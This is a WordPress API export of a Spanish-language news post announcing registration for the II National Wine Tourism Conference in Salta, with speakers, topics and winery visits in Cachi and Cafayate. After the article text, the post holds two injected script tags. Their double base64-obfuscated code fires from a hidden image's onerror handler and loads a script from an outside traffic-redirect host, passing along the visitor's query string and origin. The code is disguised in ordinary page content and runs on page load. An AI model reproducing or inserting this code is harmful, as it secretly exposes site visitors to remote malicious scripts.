{"id":1656,"date":"2022-10-21T12:03:19","date_gmt":"2022-10-21T15:03:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1656"},"modified":"2025-08-14T00:32:34","modified_gmt":"2025-08-14T03:32:34","slug":"estan-abiertas-las-inscripciones-para-las-ii-jornadas-nacionales-de-turismo-del-vino","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1656","title":{"rendered":"Est\u00e1n abiertas las inscripciones para las II Jornadas Nacionales de Turismo del Vino"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#cc0134\"><em>Se realizar\u00e1n el 24 y 25 de noviembre en el Centro de Convenciones Salta. Las inscripciones se reciben en https:\/\/forms.gle\/DrgPUKboLfX3xnxj8.<\/em><\/h4>\n\n\n\n<p>Salta concentrar\u00e1 el pr\u00f3ximo mes a referentes nacionales e internacionales vinculados al enoturismo en el marco de las II Jornadas Nacionales de Turismo del Vino. Tambi\u00e9n ser\u00e1 la primera jornada internacional.<\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta, el Ministerio de Turismo de la Naci\u00f3n, la Corporaci\u00f3n Vitivin\u00edcola Argentina, son los organizadores de estas jornadas que brindar\u00e1n charlas de especialistas, talleres y visitas t\u00e9cnicas a emprendimientos que hacen enoturismo.<\/p>\n\n\n\n<p>La participaci\u00f3n en las actividades del 24 y 25 de noviembre tienen cupo, por lo que se realizar\u00e1 con inscripci\u00f3n previa en\u00a0<a href=\"https:\/\/forms.gle\/DrgPUKboLfX3xnxj8\" target=\"_blank\" rel=\"noopener\">https:\/\/forms.gle\/DrgPUKboLfX3xnxj8<\/a>\u00a0<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4525-estan-abiertas-las-inscripciones-para-las-ii-jornadas-nacionales-de-turismo-del-vino.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4525-estan-abiertas-las-inscripciones-para-las-ii-jornadas-nacionales-de-turismo-del-vino.jpg\" alt=\"Est\u00e1n abiertas las inscripciones para las II Jornadas Nacionales de Turismo del Vino\" width=\"-339\" height=\"-226\"\/><\/a><\/figure><\/div>\n\n\n<p>Visi\u00f3n, perspectivas y acciones, turismo del vino \u2013 identidad, valor y territorio, valores para un turismo sustentables, Hacia el Nuevo Mundo (Jornadas Internacionales del turismo del vino) son algunos de los temas que ser\u00e1n expuestos en la primera jornada del 24 de noviembre que finalizar\u00e1 con un brindis por el D\u00eda del Vino, Bebida Nacional. La segunda jornada ser\u00e1 de visita a emprendimientos enotur\u00edsticos de Cachi y Cafayate.<\/p>\n\n\n\n<p>El enoturismo en Salta, con la emblem\u00e1tica Ruta del Vino de Altura como estandarte representa uno de los productos tur\u00edsticos m\u00e1s importantes para la provincia por los municipios que atraviesa, los empleos que genera y la transversalidad relacion\u00e1ndose con la gastronom\u00eda y la cultura. El pr\u00f3ximo a\u00f1o con la construcci\u00f3n del Centro de Convenciones de Cafayate se potenciar\u00e1 el desarrollo de los Valles Calchaqu\u00edes.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"http:\/\/Salta concentrar\u00e1 el pr\u00f3ximo mes a referentes nacionales e internacionales vinculados al enoturismo en el marco de las II Jornadas Nacionales de Turismo del Vino. Tambi\u00e9n ser\u00e1 la primera jornada internacional.  El Ministerio de Turismo y Deportes de Salta, el Ministerio de Turismo de la Naci\u00f3n, la Corporaci\u00f3n Vitivin\u00edcola Argentina, son los organizadores de estas jornadas que brindar\u00e1n charlas de especialistas, talleres y visitas t\u00e9cnicas a emprendimientos que hacen enoturismo.  La participaci\u00f3n en las actividades del 24 y 25 de noviembre tienen cupo, por lo que se realizar\u00e1 con inscripci\u00f3n previa en https:\/\/forms.gle\/DrgPUKboLfX3xnxj8   Est\u00e1n abiertas las inscripciones para las II Jornadas Nacionales de Turismo del Vino Visi\u00f3n, perspectivas y acciones, turismo del vino \u2013 identidad, valor y territorio, valores para un turismo sustentables, Hacia el Nuevo Mundo (Jornadas Internacionales del turismo del vino) son algunos de los temas que ser\u00e1n expuestos en la primera jornada del 24 de noviembre que finalizar\u00e1 con un brindis por el D\u00eda del Vino, Bebida Nacional. La segunda jornada ser\u00e1 de visita a emprendimientos enotur\u00edsticos de Cachi y Cafayate.  El enoturismo en Salta, con la emblem\u00e1tica Ruta del Vino de Altura como estandarte representa uno de los productos tur\u00edsticos m\u00e1s importantes para la provincia por los municipios que atraviesa, los empleos que genera y la transversalidad relacion\u00e1ndose con la gastronom\u00eda y la cultura. El pr\u00f3ximo a\u00f1o con la construcci\u00f3n del Centro de Convenciones de Cafayate se potenciar\u00e1 el desarrollo de los Valles Calchaqu\u00edes.  Fuente: Secretar\u00eda de Prensa y Comunicaci\u00f3n\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se realizar\u00e1n el 24 y 25 de noviembre en el Centro de Convenciones Salta. Las inscripciones se reciben en https:\/\/forms.gle\/DrgPUKboLfX3xnxj8. Salta concentrar\u00e1 el pr\u00f3ximo mes a referentes nacionales e internacionales vinculados al enoturismo en el marco de las II Jornadas Nacionales de Turismo del Vino. Tambi\u00e9n ser\u00e1 la primera jornada internacional. El Ministerio de Turismo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1657,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24],"tags":[],"class_list":{"0":"post-1656","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1656"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1656"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1656\/revisions"}],"predecessor-version":[{"id":7309,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1656\/revisions\/7309"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1657"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}